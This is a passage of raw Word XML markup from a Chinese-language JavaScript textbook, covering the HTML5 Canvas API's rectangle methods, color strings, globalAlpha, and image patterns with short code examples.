      </w:r>
      <w:r>
        <w:t>(75,250)</w:t>
      </w:r>
      <w:r>
        <w:t>开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.quadraticCurveTo(100,200,175,250);//</w:t>
      </w:r>
      <w:r>
        <w:t>画一条以一直到点</w:t>
      </w:r>
      <w:r>
        <w:t>(175,250)</w:t>
      </w:r>
      <w:r>
        <w:t>结束的曲线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.</w:t>
      </w:r>
      <w:r>
        <w:t>fillRect(100-3,200-3,6,6);//</w:t>
      </w:r>
      <w:r>
        <w:t>标记控制点</w:t>
      </w:r>
      <w:r>
        <w:t>(100,200)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>三次贝塞尔曲线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(200,250);//</w:t>
      </w:r>
      <w:r>
        <w:t>从点</w:t>
      </w:r>
      <w:r>
        <w:t>(200,250)</w:t>
      </w:r>
      <w:r>
        <w:t>开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.bezierCurveTo(220,220,280,280,300,250);//</w:t>
      </w:r>
      <w:r>
        <w:t>画一条以一直到点</w:t>
      </w:r>
      <w:r>
        <w:t>(300,250)</w:t>
      </w:r>
      <w:r>
        <w:t>结束的曲线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillRect(220-3,220-3,6,6);//</w:t>
      </w:r>
      <w:r>
        <w:t>标记控制点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillRect(280-3,280-3,6,6);//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一些图形属性并绘制曲线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillStyle="#aaa";//</w:t>
      </w:r>
      <w:r>
        <w:t>填充</w:t>
      </w:r>
      <w:r>
        <w:t>灰色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineWidth=5;//5</w:t>
      </w:r>
      <w:r>
        <w:t>个像素宽的黑色（默认颜色）线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fill();//</w:t>
      </w:r>
      <w:r>
        <w:t>填充该曲线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.stroke();//</w:t>
      </w:r>
      <w:r>
        <w:t>勾勒外边框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="536" w:name="21_4_6_Ju_Xing_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>21.4.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　矩形</w:t>
      </w:r>
      <w:bookmarkEnd w:id="536"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个用于绘制矩形的方法。例</w:t>
      </w:r>
      <w:r>
        <w:t>21-7</w:t>
      </w:r>
      <w:r>
        <w:t>使用了其中一个方法：</w:t>
      </w:r>
      <w:r>
        <w:t>fillRect()</w:t>
      </w:r>
      <w:r>
        <w:t>，来标记贝塞尔曲线的控制点。这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个绘制矩形的方法都接受两个参数，其中一个指定矩形的一个顶点，另一个参数指定矩形的宽和高。一般都是指定矩形的左上角顶点，然后再传递表示一个宽度和高度的正值，当然也可以指定其他的顶点然后传递表示宽度和高度的负值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>fillRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使用当前的</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>来填充指定的矩形。</w:t>
      </w:r>
      <w:r>
        <w:t>strokeRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使用当前的</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>和其他线</w:t>
      </w:r>
      <w:r>
        <w:t>段的属性来勾勒指定矩形的外边框。</w:t>
      </w:r>
      <w:r>
        <w:t>clearRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>fillRect()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似，但是不同的是，它会忽略当前填充样式，采用透明的黑色像素（所以空白画布的默认颜色）来填充矩形。这里重要的一点是：这三个方法都不影响当前路径以及路径中的当前点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后一个用于绘制矩形的方法是</w:t>
      </w:r>
      <w:r>
        <w:t>rect()</w:t>
      </w:r>
      <w:r>
        <w:t>，此方法会对当前路径产生影响：它会在将指定的矩形添加到当前路径的子路径中。和其他用于定义路径的方法一样，它本身不会自动做任何和填充以及勾勒相关的事情。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="537" w:name="21_4_7_Yan_Se___Tou_Ming_Du___Jian_Bian_"/>
      <w:r>
        <w:t>21.4.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　颜色、透明度、渐变以及图案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="537"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>stokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fill</w:t>
      </w:r>
      <w:r>
        <w:t>Style</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了线条勾勒的样式和区域填充的样式。大部分情况下，这些属性用于指定不透明或者半透明情况下的颜色，但是，也可以将它们设置成</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasGradient</w:t>
      </w:r>
      <w:r>
        <w:t>对象，以实现采用重复的背景图片或线性或辐射型的渐变色来进行勾勒或者填充。除此之外，还可以通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>globalAlpha</w:t>
      </w:r>
      <w:r>
        <w:t>属性使得所有绘制的东西都变成半透明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要指定一种纯色，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML4</w:t>
      </w:r>
      <w:r>
        <w:t>标准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>定义的颜色名字或者使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>颜色串：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.strokeStyle="blue";//</w:t>
      </w:r>
      <w:r>
        <w:t>用蓝色勾勒线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>co</w:t>
      </w:r>
      <w:r>
        <w:t>ntext.fillStyle="#aaa";//</w:t>
      </w:r>
      <w:r>
        <w:t>用浅灰色填充区域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性的默认值都是</w:t>
      </w:r>
      <w:r>
        <w:t>"#000000"</w:t>
      </w:r>
      <w:r>
        <w:t>：不透明黑色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>目前，支持</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>颜色的浏览器除了允许标准的</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>进制</w:t>
      </w:r>
      <w:r>
        <w:t>RGB</w:t>
      </w:r>
      <w:r>
        <w:t>颜色之外，还允许使用</w:t>
      </w:r>
      <w:r>
        <w:t>RGB</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>RGBA</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>HSL</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HSLA</w:t>
      </w:r>
      <w:r>
        <w:t>颜色空间。如下是一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var colors=[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"#f44",//</w:t>
      </w:r>
      <w:r>
        <w:t>十六进制</w:t>
      </w:r>
      <w:r>
        <w:t>RGB</w:t>
      </w:r>
      <w:r>
        <w:t>色值：红色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"#44ff44",//</w:t>
      </w:r>
      <w:r>
        <w:t>十六进制</w:t>
      </w:r>
      <w:r>
        <w:t>RRGGBB</w:t>
      </w:r>
      <w:r>
        <w:t>色值：绿色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"rgb(60,60,255)",//</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:t>之间的整数来表示的</w:t>
      </w:r>
      <w:r>
        <w:t>RGB</w:t>
      </w:r>
      <w:r>
        <w:t>色值：蓝色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"rgb(100%,25%,100%)",//</w:t>
      </w:r>
      <w:r>
        <w:t>用百分比来表示的</w:t>
      </w:r>
      <w:r>
        <w:t>RGB</w:t>
      </w:r>
      <w:r>
        <w:t>色值：紫色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"rgba(100%,25%,100%,0.5)",//RGB</w:t>
      </w:r>
      <w:r>
        <w:t>加上</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>值：半透明紫色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"rgba(0,0,0,0)",//</w:t>
      </w:r>
      <w:r>
        <w:t>全透明黑色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"transparent",//</w:t>
      </w:r>
      <w:r>
        <w:t>和上述类似</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"hsl(60,100%,50%)",//</w:t>
      </w:r>
      <w:r>
        <w:t>全饱和黄色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"hsl(60,75%,50%)",//</w:t>
      </w:r>
      <w:r>
        <w:t>低饱和黄色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"hsl(60,100%,75%)",//</w:t>
      </w:r>
      <w:r>
        <w:t>全饱和暗黄色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"hsl(60,100%,25%)",//</w:t>
      </w:r>
      <w:r>
        <w:t>全饱和亮黄色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"hsla(60,100%,50%,0.5)",//</w:t>
      </w:r>
      <w:r>
        <w:t>全饱和黄色，</w:t>
      </w:r>
      <w:r>
        <w:t>50%</w:t>
      </w:r>
      <w:r>
        <w:t>不透明度</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HSL</w:t>
      </w:r>
      <w:r>
        <w:t>颜色空间采用三个数字来指定颜色，这个三个数字分别代表色调、饱和度和亮度。其中色调是颜色轮周围的度数。色调是</w:t>
      </w:r>
      <w:r>
        <w:t>0°</w:t>
      </w:r>
      <w:r>
        <w:t>表示红色，</w:t>
      </w:r>
      <w:r>
        <w:t>60°</w:t>
      </w:r>
      <w:r>
        <w:t>表示黄色，</w:t>
      </w:r>
      <w:r>
        <w:t>120°</w:t>
      </w:r>
      <w:r>
        <w:t>表示绿色，</w:t>
      </w:r>
      <w:r>
        <w:t>180°</w:t>
      </w:r>
      <w:r>
        <w:t>表示靛色，</w:t>
      </w:r>
      <w:r>
        <w:t>240°</w:t>
      </w:r>
      <w:r>
        <w:t>表示蓝色，</w:t>
      </w:r>
      <w:r>
        <w:t>300°</w:t>
      </w:r>
      <w:r>
        <w:t>表示品红色，</w:t>
      </w:r>
      <w:r>
        <w:t>360°</w:t>
      </w:r>
      <w:r>
        <w:t>再次转回红色。饱和度描述的是颜色的强度，它是以百分比来表示的。饱和度为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的颜色就是暗灰色。亮度描述的是一种颜色多么的明亮或者多么的暗淡，它也是以百分比来表示的。任何</w:t>
      </w:r>
      <w:r>
        <w:t>HSL</w:t>
      </w:r>
      <w:r>
        <w:t>颜色，凡是亮度为</w:t>
      </w:r>
      <w:r>
        <w:t>100%</w:t>
      </w:r>
      <w:r>
        <w:t>的都是</w:t>
      </w:r>
      <w:r>
        <w:t>纯白色，同样，任何亮度为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的颜色都是纯黑色。</w:t>
      </w:r>
      <w:r>
        <w:t>HSLA</w:t>
      </w:r>
      <w:r>
        <w:t>颜色空间和</w:t>
      </w:r>
      <w:r>
        <w:t>HSL</w:t>
      </w:r>
      <w:r>
        <w:t>类似，只是前者增加了一个</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>值，它的取值范围从</w:t>
      </w:r>
      <w:r>
        <w:t>0.0</w:t>
      </w:r>
      <w:r>
        <w:t>（透明）～</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>（不透明）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果又想要半透明的颜色，又不想显式地给每种颜色都设置一个透明通道的话，又或者想要给透明的图片或者图案添加半透明效果（比方说）的话，可以通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>globalAlpha</w:t>
      </w:r>
      <w:r>
        <w:t>属性。这样，每一</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>个绘制的像素都会将其</w:t>
      </w:r>
      <w:r>
        <w:t>alpha</w:t>
      </w:r>
      <w:r>
        <w:t>值乘以设置的</w:t>
      </w:r>
      <w:r>
        <w:t>globaAlpha</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
      <w:r>
        <w:t>globalAlpha</w:t>
      </w:r>
      <w:r>
        <w:t>属性默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，表示不透明。如果将其值设置为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的话，那么所有绘制的图形都会变成全透明，这</w:t>
      </w:r>
      <w:r>
        <w:t>样一来，看上去画布上就什么也没有。而如果设置为</w:t>
      </w:r>
      <w:r>
        <w:t>0.5</w:t>
      </w:r>
      <w:r>
        <w:t>的话，那么所有绘制的原本不透明的像素都会变成</w:t>
      </w:r>
      <w:r>
        <w:t>50%</w:t>
      </w:r>
      <w:r>
        <w:t>的不透明度。而如果原本像素是</w:t>
      </w:r>
      <w:r>
        <w:t>50%</w:t>
      </w:r>
      <w:r>
        <w:t>不透明度的话就变成</w:t>
      </w:r>
      <w:r>
        <w:t>25%</w:t>
      </w:r>
      <w:r>
        <w:t>的不透明度。如果设置了</w:t>
      </w:r>
      <w:r>
        <w:t>globalAlpha</w:t>
      </w:r>
      <w:r>
        <w:t>，所有的像素都会变成半透明，这个时候不得不去考虑，像素的重叠问题</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>可以参见</w:t>
      </w:r>
      <w:r>
        <w:t>21.4.13</w:t>
      </w:r>
      <w:r>
        <w:t>节来了解关于画布合成模型相关的细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果不想绘制纯色（也许是半透明的），可以使用渐变和重复图片来填充和勾勒路径。图</w:t>
      </w:r>
      <w:r>
        <w:t>21-10</w:t>
      </w:r>
      <w:r>
        <w:t>所示的矩形，用宽线条来勾勒，上面采用线性渐变填充，下面则使用半透明的辐射状渐变填充。下面的代</w:t>
      </w:r>
      <w:r>
        <w:t>码片段展示了这些图案和渐变是如何创建出来的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要使用背景图片的图案而不是颜色来填充或者勾勒，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>fillStyle</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置成</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPattern</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象可以通过调用上下文对象的</w:t>
      </w:r>
      <w:r>
        <w:t>createPattern()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var image=document.getElementById("myimage");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillStyle=c.createPattern(image,"repeat");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>createPattern()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的第一个参数指定了用做图案的图片。它</w:t>
      </w:r>
      <w:r>
        <w:t>必须是文档中的一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>img</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素、＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素或者＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素（或者是通过</w:t>
      </w:r>
      <w:r>
        <w:t>Image()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建出来的图片对象）。第二个参数通常是</w:t>
      </w:r>
      <w:r>
        <w:t>"repeat"</w:t>
      </w:r>
      <w:r>
        <w:t>，表示采用重复的图片填充，这和图片大小是无关的。除此之外，还可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>"repeat-x"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"repeat-y"</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>"no-repeat"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是还可以采用一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素（甚至是一个从未添加到文档中并且不可见的＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素）作为另外一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的图案：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var offscreen=document.create</w:t>
      </w:r>
      <w:r>
        <w:t>Element("canvas");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个屏幕外画布</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>offscreen.width=offscreen.height=10;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置它的大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>offscreen.getContext("2d").strokeRect(0,0,6,6);//</w:t>
      </w:r>
      <w:r>
        <w:t>获取它的上下文并进行绘制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pattern=c.createPattern(offscreen,"repeat");//</w:t>
      </w:r>
      <w:r>
        <w:t>将它用做图案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4032849" cy="3950898"/>
